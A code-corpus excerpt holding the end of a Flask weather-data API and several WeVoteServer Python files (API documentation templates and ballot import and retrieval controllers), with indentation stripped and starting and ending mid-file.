f"/temp_dates/'your_date'<br/><br/>"
f"Min, Max, and Avg Temperatures from start to end date: yyyy-mm-dd/yyyy-mm-dd<br/><br/>"
f"/temp_dates/'start_date'/'end_date'<br/><br/>"
)
@app.route("/precipitation_2016_2017")
def precipitation():
session = Session(engine)
last_yr_prcp_df = pd.DataFrame(session.query(m_table_ref.date, m_table_ref.prcp).\
# filter(m_table_ref.date <= '2017-08-23').\
# filter(m_table_ref.date > '2016-08-23').\
order_by(m_table_ref.date).all())
return last_yr_prcp_df.to_json()
@app.route("/station_list")
def stations():
session = Session(engine)
station_list_df = pd.DataFrame(session.query(s_table_ref.station,s_table_ref.name ).\
group_by(s_table_ref.station).\
order_by(s_table_ref.station).all())
station_list = list(station_list_df['name'])
return jsonify(station_list)
@app.route("/temperatures_waihee")
def temperatures():
session = Session(engine)
waihee_temp_df = pd.DataFrame(session.query(m_table_ref.date, m_table_ref.tobs).\
filter(m_table_ref.station == 'USC00519281').\
filter(m_table_ref.date >= '2017-01-01').\
filter(m_table_ref.date <= '2017-12-31').\
group_by(m_table_ref.date).all())
return waihee_temp_df.to_json()
@app.route("/temp_dates/<your_date>")
def start_date(your_date):
session = Session(engine)
temp_df = pd.DataFrame(session.query(m_table_ref.date, m_table_ref.tobs).\
filter(m_table_ref.date >= your_date).all())
temp_funcs_df = pd.DataFrame({'Min: ': temp_df['tobs'].min(), 'Max: ': temp_df['tobs'].max(), 'Avg: ': temp_df['tobs'].mean()}, index=["Temp: "])
return temp_funcs_df.to_json()
@app.route("/temp_dates/<start_date>/<end_date>")
def start_end_date(start_date, end_date):
session = Session(engine)
temp_df = pd.DataFrame(session.query(m_table_ref.date, m_table_ref.tobs).\
filter(m_table_ref.date >= start_date).\
filter(m_table_ref.date <= end_date).all())
temp_funcs_df = pd.DataFrame({'Min: ': temp_df['tobs'].min(), 'Max: ': temp_df['tobs'].max(), 'Avg: ': temp_df['tobs'].mean()}, index=["Temp: "])
return temp_funcs_df.to_json()
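# Example requests once the app is running (host/port are Flask's defaults
# and purely illustrative):
#   curl http://127.0.0.1:5000/precipitation_2016_2017
#   curl http://127.0.0.1:5000/station_list
#   curl http://127.0.0.1:5000/temp_dates/2017-01-01
#   curl http://127.0.0.1:5000/temp_dates/2017-01-01/2017-08-23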
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "josephevans/WeVoteServer",
"score": 2
} |
#### File: apis_v1/documentation_source/ballot_items_sync_out_doc.py
```python
def ballot_items_sync_out_doc_template_values(url_root):
"""
Show documentation about ballotItemsSyncOut
"""
required_query_parameter_list = [
{
'name': 'format',
'value': 'string', # boolean, integer, long, string
'description': 'Currently must be \'json\' to work.',
},
]
optional_query_parameter_list = [
{
'name': 'google_civic_election_id',
'value': 'integer', # boolean, integer, long, string
'description': 'Limit the ballot_items retrieved to those for this google_civic_election_id.',
},
]
potential_status_codes_list = [
]
try_now_link_variables_dict = {
'format': 'json',
}
api_response = '[{\n' \
' "we_vote_id": string,\n' \
' "ballot_item_display_name": string,\n' \
' "contest_office_we_vote_id": string,\n' \
' "contest_measure_we_vote_id": string,\n' \
' "google_ballot_placement": string,\n' \
' "google_civic_election_id": string,\n' \
' "local_ballot_order": string,\n' \
' "measure_subtitle": string,\n' \
' "polling_location_we_vote_id": string,\n' \
'}]'
template_values = {
'api_name': 'ballotItemsSyncOut',
'api_slug': 'ballotItemsSyncOut/?format=json',
'api_introduction':
"",
'try_now_link': 'apis_v1:ballotItemsSyncOutView',
'try_now_link_variables_dict': try_now_link_variables_dict,
'url_root': url_root,
'get_or_post': 'GET',
'required_query_parameter_list': required_query_parameter_list,
'optional_query_parameter_list': optional_query_parameter_list,
'api_response': api_response,
'api_response_notes':
"",
'potential_status_codes_list': potential_status_codes_list,
}
return template_values
```
#### File: apis_v1/documentation_source/organization_search_doc.py
```python
def organization_search_doc_template_values(url_root):
"""
Show documentation about organizationSearch
"""
required_query_parameter_list = [
{
'name': 'voter_device_id',
'value': 'string', # boolean, integer, long, string
'description': 'An 88 character unique identifier linked to a voter record on the server',
},
{
'name': 'api_key',
'value': 'string (from post, cookie, or get (in that order))', # boolean, integer, long, string
'description': 'The unique key provided to any organization using the WeVoteServer APIs',
},
]
optional_query_parameter_list = [
{
'name': 'organization_name',
'value': 'string', # boolean, integer, long, string
'description': 'Name of the organization that is displayed.',
},
{
'name': 'organization_email',
'value': 'string', # boolean, integer, long, string
'description': 'Contact email of the organization.',
},
{
'name': 'organization_website',
'value': 'string', # boolean, integer, long, string
'description': 'Website of the organization.',
},
{
'name': 'organization_twitter_handle',
'value': 'string', # boolean, integer, long, string
'description': 'Twitter handle of the organization.',
},
]
potential_status_codes_list = [
{
'code': 'VALID_VOTER_DEVICE_ID_MISSING',
'description': 'Cannot proceed. A valid voter_device_id parameter was not included.',
},
{
'code': 'VALID_VOTER_ID_MISSING',
'description': 'Cannot proceed. A valid voter_id was not found.',
},
{
'code': 'ORGANIZATION_SEARCH_ALL_TERMS_MISSING',
'description': 'Cannot proceed. No search terms were provided.',
},
{
'code': 'ORGANIZATIONS_RETRIEVED',
'description': 'Successfully returned a list of organizations that match search query.',
},
{
'code': 'NO_ORGANIZATIONS_RETRIEVED',
'description': 'Successfully searched, but no organizations found that match search query.',
},
]
try_now_link_variables_dict = {
# 'organization_we_vote_id': 'wv85org1',
}
api_response = '{\n' \
' "status": string,\n' \
' "success": boolean,\n' \
' "voter_device_id": string (88 characters long),\n' \
' "organization_email": string (the original search term passed in),\n' \
' "organization_name": string (the original search term passed in),\n' \
' "organization_twitter_handle": string (the original search term passed in),\n' \
' "organization_website": string (the original search term passed in),\n' \
' "organizations_list": list\n' \
' [\n' \
' "organization_id": integer,\n' \
' "organization_we_vote_id": string,\n' \
' "organization_name": string,\n' \
' "organization_twitter_handle": string,\n' \
' "organization_facebook": string,\n' \
' "organization_email": string,\n' \
' "organization_website": string,\n' \
' ],\n' \
'}'
template_values = {
'api_name': 'organizationSearch',
'api_slug': 'organizationSearch',
'api_introduction':
"Find a list of all organizations that match any of the search terms.",
'try_now_link': 'apis_v1:organizationSearchView',
'try_now_link_variables_dict': try_now_link_variables_dict,
'url_root': url_root,
'get_or_post': 'GET',
'required_query_parameter_list': required_query_parameter_list,
'optional_query_parameter_list': optional_query_parameter_list,
'api_response': api_response,
'api_response_notes':
"",
'potential_status_codes_list': potential_status_codes_list,
}
return template_values
```
#### File: apis_v1/documentation_source/twitter_sign_in_request_voter_info_doc.py
```python
def twitter_sign_in_request_voter_info_doc_template_values(url_root):
"""
Show documentation about twitterSignInRequestVoterInfo
"""
required_query_parameter_list = [
{
'name': 'voter_device_id',
'value': 'string', # boolean, integer, long, string
'description': 'An 88 character unique identifier linked to a voter record on the server',
},
{
'name': 'return_url',
'value': 'string', # boolean, integer, long, string
'description': 'The URL where the browser should be redirected once authenticated. '
'Usually https://wevote.me/more/sign_in',
},
{
'name': 'api_key',
'value': 'string (from post, cookie, or get (in that order))', # boolean, integer, long, string
'description': 'The unique key provided to any organization using the WeVoteServer APIs',
},
]
optional_query_parameter_list = [
{
'name': 'switch_accounts_if_needed',
'value': 'boolean', # boolean, integer, long, string
'description': 'If a We Vote account already exists for this Twitter handle, create a new session tied to'
' that account. If this variable is not passed in, it defaults to true.',
},
]
potential_status_codes_list = [
{
'code': 'VALID_VOTER_DEVICE_ID_MISSING',
'description': 'Cannot proceed. A valid voter_device_id parameter was not included.',
},
{
'code': 'VALID_VOTER_ID_MISSING',
'description': 'Cannot proceed. A valid voter_id was not found.',
},
]
try_now_link_variables_dict = {
}
api_response = '{\n' \
' "status": string,\n' \
' "success": boolean,\n' \
' "voter_device_id": string (88 characters long),\n' \
' "twitter_handle": string,\n' \
' "twitter_handle_found": boolean,\n' \
' "voter_info_retrieved": boolean,\n' \
' "switch_accounts": boolean,\n' \
' "return_url": string, (This is the final url to return to once authentication is complete. ' \
'If set, the twitterSignInRequestAccessToken api redirects to the twitterSignInRequestVoterInfo ' \
'api before redirecting to the value in return_url)\n' \
'}'
template_values = {
'api_name': 'twitterSignInRequestVoterInfo',
'api_slug': 'twitterSignInRequestVoterInfo',
'api_introduction':
"Flow chart showing entire process here: "
"https://docs.google.com/drawings/d/1WdVFsPZl3aLM9wxGuPTW3veqP-5EmZKv36KWjTz5pbU/edit",
'try_now_link': 'apis_v1:twitterSignInRequestVoterInfoView',
'try_now_link_variables_dict': try_now_link_variables_dict,
'url_root': url_root,
'get_or_post': 'GET',
'required_query_parameter_list': required_query_parameter_list,
'optional_query_parameter_list': optional_query_parameter_list,
'api_response': api_response,
'api_response_notes':
"",
'potential_status_codes_list': potential_status_codes_list,
}
return template_values
```
#### File: apis_v1/documentation_source/voter_address_save_doc.py
```python
def voter_address_save_doc_template_values(url_root):
"""
Show documentation about voterAddressSave
"""
required_query_parameter_list = [
{
'name': 'api_key',
'value': 'string (from post, cookie, or get (in that order))', # boolean, integer, long, string
'description': 'The unique key provided to any organization using the WeVoteServer APIs',
},
{
'name': 'voter_device_id',
'value': 'string', # boolean, integer, long, string
'description': 'An 88 character unique identifier linked to a voter record on the server',
},
{
'name': 'text_for_map_search',
'value': 'string', # boolean, integer, long, string
'description': 'The address text a voter enters to identify the location tied to their ballot. '
'(Not mailing address.)',
},
]
optional_query_parameter_list = [
# {
# 'name': '',
# 'value': '', # boolean, integer, long, string
# 'description': '',
# },
]
potential_status_codes_list = [
{
'code': 'VALID_VOTER_DEVICE_ID_MISSING',
'description': 'Cannot proceed. A valid voter_device_id parameter was not included.',
},
{
'code': 'MISSING_VOTER_ID_OR_ADDRESS_TYPE',
'description': 'Cannot proceed. Missing variables voter_id or address_type while trying to save.',
},
{
'code': 'VOTER_ADDRESS_SAVED',
'description': 'Successfully saved',
},
{
'code': 'MULTIPLE_MATCHING_ADDRESSES_FOUND',
'description': 'Could not save. Multiple entries already saved.',
},
{
'code': 'MISSING_POST_VARIABLE-ADDRESS',
'description': 'Could not save. POST variable \'address\' is required.',
},
]
try_now_link_variables_dict = {
# 'organization_we_vote_id': 'wv85org1',
}
api_response = '{\n' \
' "status": string,\n' \
' "success": boolean,\n' \
' "voter_device_id": string (88 characters long),\n' \
' "google_civic_election_id": integer,\n' \
' "text_for_map_search": string,\n' \
' "substituted_address_nearby": string,\n' \
' "ballot_found": boolean,\n' \
' "ballot_caveat": string,\n' \
' "is_from_substituted_address": boolean,\n' \
' "is_from_test_ballot": boolean,\n' \
' "ballot_item_list": list\n' \
' [\n' \
' "ballot_item_display_name": string,\n' \
' "voter_id": integer,\n' \
' "google_civic_election_id": integer,\n' \
' "google_ballot_placement": integer,\n' \
' "local_ballot_order": integer,\n' \
' "kind_of_ballot_item": string (CANDIDATE, MEASURE),\n' \
' "id": integer,\n' \
' "we_vote_id": string,\n' \
' "candidate_list": list\n' \
' [\n' \
' "id": integer,\n' \
' "we_vote_id": string,\n' \
' "ballot_item_display_name": string,\n' \
' "candidate_photo_url": string,\n' \
' "party": string,\n' \
' "order_on_ballot": integer,\n' \
' ],\n' \
' ],\n' \
'}'
template_values = {
'api_name': 'voterAddressSave',
'api_slug': 'voterAddressSave',
'api_introduction':
"Save or create an address for the current voter. Then return the same results as we return with "
"voterBallotItemsRetrieve.",
'try_now_link': 'apis_v1:voterAddressSaveView',
'try_now_link_variables_dict': try_now_link_variables_dict,
'url_root': url_root,
'get_or_post': 'GET',
'required_query_parameter_list': required_query_parameter_list,
'optional_query_parameter_list': optional_query_parameter_list,
'api_response': api_response,
'api_response_notes':
"",
'potential_status_codes_list': potential_status_codes_list,
}
return template_values
```
#### File: WeVoteServer/ballot/controllers.py
```python
from .models import BallotItemListManager, BallotItemManager, BallotReturnedListManager, BallotReturnedManager, \
CANDIDATE, copy_existing_ballot_items_from_stored_ballot, OFFICE, MEASURE, \
VoterBallotSaved, VoterBallotSavedManager
from candidate.models import CandidateCampaignListManager
from config.base import get_environment_variable
from datetime import datetime
from django.contrib import messages
from election.models import ElectionManager
from exception.models import handle_exception
from import_export_google_civic.controllers import voter_ballot_items_retrieve_from_google_civic_for_api
import json
from measure.models import ContestMeasureList
from office.models import ContestOfficeListManager
from polling_location.models import PollingLocationManager
import requests
from voter.models import BALLOT_ADDRESS, VoterAddressManager, \
VoterDeviceLinkManager
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
GOOGLE_CIVIC_API_KEY = get_environment_variable("GOOGLE_CIVIC_API_KEY")
WE_VOTE_API_KEY = get_environment_variable("WE_VOTE_API_KEY")
BALLOT_ITEMS_SYNC_URL = get_environment_variable("BALLOT_ITEMS_SYNC_URL")
BALLOT_RETURNED_SYNC_URL = get_environment_variable("BALLOT_RETURNED_SYNC_URL")
def ballot_items_import_from_master_server(request, google_civic_election_id):
"""
Get the json data, and either create new entries or update existing ones
:return:
"""
# Request json file from We Vote servers
messages.add_message(request, messages.INFO, "Loading Ballot Items from We Vote Master servers")
logger.info("Loading Ballot Items from We Vote Master servers")
response = requests.get(BALLOT_ITEMS_SYNC_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
"format": 'json',
"google_civic_election_id": google_civic_election_id,
})
structured_json = json.loads(response.text)
results = filter_ballot_items_structured_json_for_local_duplicates(structured_json)
filtered_structured_json = results['structured_json']
duplicates_removed = results['duplicates_removed']
import_results = ballot_items_import_from_structured_json(filtered_structured_json)
import_results['duplicates_removed'] = duplicates_removed
return import_results
def ballot_returned_import_from_master_server(request, google_civic_election_id):
"""
Get the json data, and either create new entries or update existing ones
:return:
"""
# Request json file from We Vote servers
messages.add_message(request, messages.INFO, "Loading Ballot Returned entries (saved ballots, specific to one "
"location) from We Vote Master servers")
logger.info("Loading Ballot Returned entries (saved ballots, specific to one location) from We Vote Master servers")
response = requests.get(BALLOT_RETURNED_SYNC_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
"format": 'json',
"google_civic_election_id": google_civic_election_id,
})
structured_json = json.loads(response.text)
results = filter_ballot_returned_structured_json_for_local_duplicates(structured_json)
filtered_structured_json = results['structured_json']
duplicates_removed = results['duplicates_removed']
import_results = ballot_returned_import_from_structured_json(filtered_structured_json)
import_results['duplicates_removed'] = duplicates_removed
return import_results
def filter_ballot_items_structured_json_for_local_duplicates(structured_json):
"""
With this function, we remove ballot_items that seem to be duplicates, but have different we_vote_id's.
We do not check to see if we have a matching office or measure in the database in this routine --
that is done elsewhere.
:param structured_json:
:return:
"""
duplicates_removed = 0
filtered_structured_json = []
ballot_item_list_manager = BallotItemListManager()
for one_ballot_item in structured_json:
ballot_item_display_name = one_ballot_item['ballot_item_display_name'] \
if 'ballot_item_display_name' in one_ballot_item else ''
google_civic_election_id = one_ballot_item['google_civic_election_id'] \
if 'google_civic_election_id' in one_ballot_item else ''
polling_location_we_vote_id = one_ballot_item['polling_location_we_vote_id'] \
if 'polling_location_we_vote_id' in one_ballot_item else ''
contest_office_we_vote_id = one_ballot_item['contest_office_we_vote_id'] \
if 'contest_office_we_vote_id' in one_ballot_item else ''
contest_measure_we_vote_id = one_ballot_item['contest_measure_we_vote_id'] \
if 'contest_measure_we_vote_id' in one_ballot_item else ''
# Check to see if there is an entry that matches in all critical ways, minus the
# contest_office_we_vote_id or contest_measure_we_vote_id. That is, an entry for a
# google_civic_election_id + polling_location_we_vote_id that has the same ballot_item_display_name,
# but different contest_office_we_vote_id or contest_measure_we_vote_id
results = ballot_item_list_manager.retrieve_possible_duplicate_ballot_items(
ballot_item_display_name, google_civic_election_id, polling_location_we_vote_id, contest_office_we_vote_id,
contest_measure_we_vote_id)
if results['ballot_item_list_found']:
# There seems to be a duplicate already in this database using a different we_vote_id
duplicates_removed += 1
else:
filtered_structured_json.append(one_ballot_item)
ballot_items_results = {
'success': True,
'status': "FILTER_BALLOT_ITEMS_FOR_DUPLICATES_PROCESS_COMPLETE",
'duplicates_removed': duplicates_removed,
'structured_json': filtered_structured_json,
}
return ballot_items_results
def filter_ballot_returned_structured_json_for_local_duplicates(structured_json):
"""
With this function, we remove ballot_returned entries that seem to be duplicates,
but have different polling_location_we_vote_id's.
We do not check to see if we have a local entry for polling_location_we_vote_id -- that is done elsewhere.
:param structured_json:
:return:
"""
duplicates_removed = 0
filtered_structured_json = []
ballot_returned_list_manager = BallotReturnedListManager()
for one_ballot_returned in structured_json:
polling_location_we_vote_id = one_ballot_returned['polling_location_we_vote_id'] \
if 'polling_location_we_vote_id' in one_ballot_returned else ''
google_civic_election_id = \
one_ballot_returned['google_civic_election_id'] if 'google_civic_election_id' in one_ballot_returned else ''
normalized_line1 = one_ballot_returned['normalized_line1'] if 'normalized_line1' in one_ballot_returned else ''
normalized_zip = one_ballot_returned['normalized_zip'] if 'normalized_zip' in one_ballot_returned else ''
# Check to see if there is an entry that matches in all critical ways, minus the polling_location_we_vote_id
results = ballot_returned_list_manager.retrieve_possible_duplicate_ballot_returned(
google_civic_election_id, normalized_line1, normalized_zip, polling_location_we_vote_id)
if results['ballot_returned_list_found']:
# There seems to be a duplicate already in this database using a different we_vote_id
duplicates_removed += 1
else:
filtered_structured_json.append(one_ballot_returned)
ballot_returned_results = {
'success': True,
'status': "FILTER_BALLOT_RETURNED_ITEMS_FOR_DUPLICATES_PROCESS_COMPLETE",
'duplicates_removed': duplicates_removed,
'structured_json': filtered_structured_json,
}
return ballot_returned_results
def ballot_items_import_from_structured_json(structured_json):
"""
This pathway requires a we_vote_id, and is not used when we import from Google Civic
:param structured_json:
:return:
"""
ballot_item_manager = BallotItemManager()
ballot_items_saved = 0
ballot_items_updated = 0
ballot_items_not_processed = 0
for one_ballot_item in structured_json:
polling_location_we_vote_id = one_ballot_item['polling_location_we_vote_id'] \
if 'polling_location_we_vote_id' in one_ballot_item else ''
google_civic_election_id = \
one_ballot_item['google_civic_election_id'] if 'google_civic_election_id' in one_ballot_item else ''
contest_office_we_vote_id = one_ballot_item['contest_office_we_vote_id'] \
if 'contest_office_we_vote_id' in one_ballot_item else ''
contest_measure_we_vote_id = one_ballot_item['contest_measure_we_vote_id'] \
if 'contest_measure_we_vote_id' in one_ballot_item else ''
if positive_value_exists(polling_location_we_vote_id) and positive_value_exists(google_civic_election_id) \
and (positive_value_exists(contest_office_we_vote_id) or
positive_value_exists(contest_measure_we_vote_id)):
# We check to make sure we have a local copy of this polling_location, contest_office or contest_measure
# in ballot_item_manager.update_or_create_ballot_item_for_polling_location
proceed_to_update_or_create = True
else:
proceed_to_update_or_create = False
if proceed_to_update_or_create:
ballot_item_display_name = one_ballot_item['ballot_item_display_name'] \
if 'ballot_item_display_name' in one_ballot_item else ''
measure_subtitle = one_ballot_item['measure_subtitle'] if 'measure_subtitle' in one_ballot_item else ''
google_ballot_placement = one_ballot_item['google_ballot_placement'] \
if 'google_ballot_placement' in one_ballot_item else 0
local_ballot_order = one_ballot_item['local_ballot_order'] \
if 'local_ballot_order' in one_ballot_item else 0
contest_office_id = 0
contest_measure_id = 0
results = ballot_item_manager.update_or_create_ballot_item_for_polling_location(
polling_location_we_vote_id, google_civic_election_id, google_ballot_placement,
ballot_item_display_name, measure_subtitle, local_ballot_order,
contest_office_id, contest_office_we_vote_id,
contest_measure_id, contest_measure_we_vote_id)
else:
ballot_items_not_processed += 1
results = {
'success': False,
'status': 'Required value missing, cannot update or create'
}
if results['success']:
if results['new_ballot_item_created']:
ballot_items_saved += 1
else:
ballot_items_updated += 1
else:
ballot_items_not_processed += 1
ballot_items_results = {
'success': True,
'status': "ballot_items_IMPORT_PROCESS_COMPLETE",
'saved': ballot_items_saved,
'updated': ballot_items_updated,
'not_processed': ballot_items_not_processed,
}
return ballot_items_results
def ballot_returned_import_from_structured_json(structured_json):
"""
This pathway requires a we_vote_id, and is not used when we import from Google Civic
:param structured_json:
:return:
"""
ballot_returned_manager = BallotReturnedManager()
polling_location_manager = PollingLocationManager()
ballot_returned_saved = 0
ballot_returned_updated = 0
ballot_returned_not_processed = 0
for one_ballot_returned in structured_json:
google_civic_election_id = \
one_ballot_returned['google_civic_election_id'] if 'google_civic_election_id' in one_ballot_returned else 0
polling_location_we_vote_id = one_ballot_returned['polling_location_we_vote_id'] \
if 'polling_location_we_vote_id' in one_ballot_returned else ''
# I don't think we expect voter_id to be other than 0 since we only import ballot_returned entries from
# polling_locations
voter_id = one_ballot_returned['voter_id'] if 'voter_id' in one_ballot_returned else 0
if positive_value_exists(google_civic_election_id) and (positive_value_exists(polling_location_we_vote_id) or
positive_value_exists(voter_id)):
# Make sure we have a local polling_location
results = polling_location_manager.retrieve_polling_location_by_id(0, polling_location_we_vote_id)
if results['polling_location_found']:
proceed_to_update_or_create = True
else:
# We don't want to save a ballot_returned entry if the polling location wasn't stored locally
proceed_to_update_or_create = False
else:
proceed_to_update_or_create = False
if proceed_to_update_or_create:
election_date = one_ballot_returned['election_date'] if 'election_date' in one_ballot_returned else False
election_description_text = one_ballot_returned['election_description_text'] \
if 'election_description_text' in one_ballot_returned else False
latitude = one_ballot_returned['latitude'] if 'latitude' in one_ballot_returned else False
longitude = one_ballot_returned['longitude'] if 'longitude' in one_ballot_returned else False
normalized_city = one_ballot_returned['normalized_city'] \
if 'normalized_city' in one_ballot_returned else False
normalized_line1 = one_ballot_returned['normalized_line1'] \
if 'normalized_line1' in one_ballot_returned else False
normalized_line2 = one_ballot_returned['normalized_line2'] \
if 'normalized_line2' in one_ballot_returned else False
normalized_state = one_ballot_returned['normalized_state'] \
if 'normalized_state' in one_ballot_returned else False
normalized_zip = one_ballot_returned['normalized_zip'] \
if 'normalized_zip' in one_ballot_returned else False
text_for_map_search = one_ballot_returned['text_for_map_search'] \
if 'text_for_map_search' in one_ballot_returned else False
results = ballot_returned_manager.update_or_create_ballot_returned(
polling_location_we_vote_id, voter_id, google_civic_election_id, election_date,
election_description_text, latitude, longitude,
normalized_city, normalized_line1, normalized_line2, normalized_state,
normalized_zip, text_for_map_search)
else:
ballot_returned_not_processed += 1
results = {
'success': False,
}
if results['success']:
if results['new_ballot_returned_created']:
ballot_returned_saved += 1
else:
ballot_returned_updated += 1
else:
ballot_returned_not_processed += 1
status = "BALLOT_RETURNED_IMPORT_PROCESS_COMPLETED"
ballot_returned_results = {
'success': True,
'status': status,
'saved': ballot_returned_saved,
'updated': ballot_returned_updated,
'not_processed': ballot_returned_not_processed,
}
return ballot_returned_results
def figure_out_google_civic_election_id_voter_is_watching(voter_device_id):
status = ''
# We zero out this value since it is never passed in to this function
google_civic_election_id = 0
# We retrieve voter_device_link
voter_device_link_manager = VoterDeviceLinkManager()
voter_device_link_results = voter_device_link_manager.retrieve_voter_device_link(voter_device_id)
if not voter_device_link_results['voter_device_link_found']:
status += "VALID_VOTER_DEVICE_ID_MISSING: " + voter_device_link_results['status']
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'voter_device_link_found': False,
'voter_address_object_found': False,
'voter_ballot_saved_found': False,
'google_civic_election_id': 0,
}
return results
voter_device_link = voter_device_link_results['voter_device_link']
voter_id = voter_device_link.voter_id
if not positive_value_exists(voter_id):
status += " " + "VALID_VOTER_ID_MISSING"
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'voter_device_link_found': False,
'voter_address_object_found': False,
'voter_ballot_saved_found': False,
'google_civic_election_id': 0,
}
return results
voter_address_manager = VoterAddressManager()
voter_address_id = 0
address_type = BALLOT_ADDRESS
voter_address_results = voter_address_manager.retrieve_address(voter_address_id, voter_id, address_type)
status += " " + voter_address_results['status']
if not positive_value_exists(voter_address_results['voter_address_has_value']):
# If there isn't an address with a value, then there won't be a voter_ballot_saved_found
results = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'voter_device_link_found': False,
'voter_address_object_found': voter_address_results['voter_address_found'],
'voter_ballot_saved_found': False,
'google_civic_election_id': 0,
}
return results
voter_address = voter_address_results['voter_address']
# This routine finds a ballot saved for this voter
choose_election_results = choose_election_from_existing_data(voter_device_link, google_civic_election_id,
voter_address)
status += " " + choose_election_results['status']
results = {
'status': status,
'success': choose_election_results['success'],
'voter_device_id': voter_device_id,
'voter_device_link_found': True,
'voter_address_object_found': voter_address_results['voter_address_found'],
'voter_ballot_saved_found': choose_election_results['voter_ballot_saved_found'],
'google_civic_election_id': choose_election_results['google_civic_election_id'],
}
return results
def voter_ballot_items_retrieve_for_api(voter_device_id, google_civic_election_id):
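# High-level flow implemented below: resolve voter_device_id to a voter,
# load that voter's ballot address, choose (or generate) a saved ballot for
# an election, then return the ballot items for that election.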
status = ''
# We retrieve voter_device_link
voter_device_link_manager = VoterDeviceLinkManager()
voter_device_link_results = voter_device_link_manager.retrieve_voter_device_link(voter_device_id)
if not voter_device_link_results['voter_device_link_found']:
status += "VALID_VOTER_DEVICE_ID_MISSING "
error_json_data = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': google_civic_election_id,
'text_for_map_search': '',
'substituted_address_nearby': '',
'ballot_caveat': '',
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
voter_device_link = voter_device_link_results['voter_device_link']
voter_id = voter_device_link.voter_id
if not positive_value_exists(voter_id):
status += " " + "VALID_VOTER_ID_MISSING"
error_json_data = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': google_civic_election_id,
'text_for_map_search': '',
'substituted_address_nearby': '',
'ballot_caveat': '',
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
voter_address_manager = VoterAddressManager()
voter_address_id = 0
address_type = BALLOT_ADDRESS
voter_address_results = voter_address_manager.retrieve_address(voter_address_id, voter_id, address_type)
status += " " + voter_address_results['status']
if not positive_value_exists(voter_address_results['voter_address_has_value']):
error_json_data = {
'status': status,
'success': voter_address_results['success'],
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': 0,
'text_for_map_search': '',
'substituted_address_nearby': '',
'ballot_caveat': '',
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
voter_address = voter_address_results['voter_address']
results = choose_election_and_prepare_ballot_data(voter_device_link, google_civic_election_id, voter_address)
status += " " + results['status']
if not results['voter_ballot_saved_found']:
if positive_value_exists(voter_address.text_for_map_search):
ballot_caveat = "We could not find a ballot near '{text_for_map_search}'.".format(
text_for_map_search=voter_address.text_for_map_search)
else:
ballot_caveat = "Please save your address so we can find your ballot."
error_json_data = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': 0,
'text_for_map_search': voter_address.text_for_map_search,
'substituted_address_nearby': '',
'ballot_caveat': ballot_caveat,
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
google_civic_election_id = results['google_civic_election_id']
voter_ballot_saved = results['voter_ballot_saved']
# Update voter_device_link
if voter_device_link.google_civic_election_id != google_civic_election_id:
voter_device_link_manager.update_voter_device_link_with_election_id(voter_device_link, google_civic_election_id)
# Update voter_address to include matching google_civic_election_id and voter_ballot_saved entry
if positive_value_exists(google_civic_election_id):
voter_address.google_civic_election_id = google_civic_election_id
voter_address_manager.update_existing_voter_address_object(voter_address)
# Get and return the ballot_item_list
results = voter_ballot_items_retrieve_for_one_election_for_api(voter_device_id, voter_id,
google_civic_election_id)
if not positive_value_exists(voter_ballot_saved.election_description_text) \
or not positive_value_exists(voter_ballot_saved.election_date_text()):
try:
election_manager = ElectionManager()
election_results = election_manager.retrieve_election(google_civic_election_id)
if election_results['election_found']:
election = election_results['election']
if not positive_value_exists(voter_ballot_saved.election_description_text):
voter_ballot_saved.election_description_text = election.election_name
if not positive_value_exists(voter_ballot_saved.election_date_text()):
voter_ballot_saved.election_date = \
datetime.strptime(election.election_day_text, "%Y-%m-%d").date()
voter_ballot_saved.save()
except Exception as e:
status += "Failed to update election_name"
status += " " + results['status']
json_data = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'ballot_found': True,
'ballot_item_list': results['ballot_item_list'],
'google_civic_election_id': google_civic_election_id,
'election_name': voter_ballot_saved.election_description_text,
'election_date': voter_ballot_saved.election_date_text(),
'text_for_map_search': voter_ballot_saved.original_text_for_map_search,
'substituted_address_nearby': voter_ballot_saved.substituted_address_nearby,
'ballot_caveat': voter_ballot_saved.ballot_caveat(),
'is_from_substituted_address': voter_ballot_saved.is_from_substituted_address,
'is_from_test_ballot': voter_ballot_saved.is_from_test_ballot,
}
return json_data
status += " " + "NO_VOTER_BALLOT_SAVED_FOUND"
error_json_data = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': 0,
'text_for_map_search': '',
'substituted_address_nearby': '',
'ballot_caveat': '',
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
def choose_election_and_prepare_ballot_data(voter_device_link, google_civic_election_id, voter_address):
voter_id = voter_device_link.voter_id
if not positive_value_exists(voter_id):
results = {
'status': "VOTER_NOT_FOUND_FROM_VOTER_DEVICE_ID",
'success': False,
'google_civic_election_id': google_civic_election_id,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None,
}
return results
# This routine finds a ballot saved for this voter
results = choose_election_from_existing_data(voter_device_link, google_civic_election_id, voter_address)
if results['voter_ballot_saved_found']:
# Return voter_ballot_saved
return results
# If here, then we need to either:
# 1) Get ballot data from Google Civic for the actual VoterAddress
# 2) Copy ballot data from a nearby address, previously retrieved from Google Civic and cached within We Vote, or
#    generated within We Vote (google_civic_election_id >= 1000000)
# 3) Get test ballot data from Google Civic
results = generate_ballot_data(voter_device_link, voter_address)
if results['voter_ballot_saved_found']:
# Return voter_ballot_saved
return results
results = {
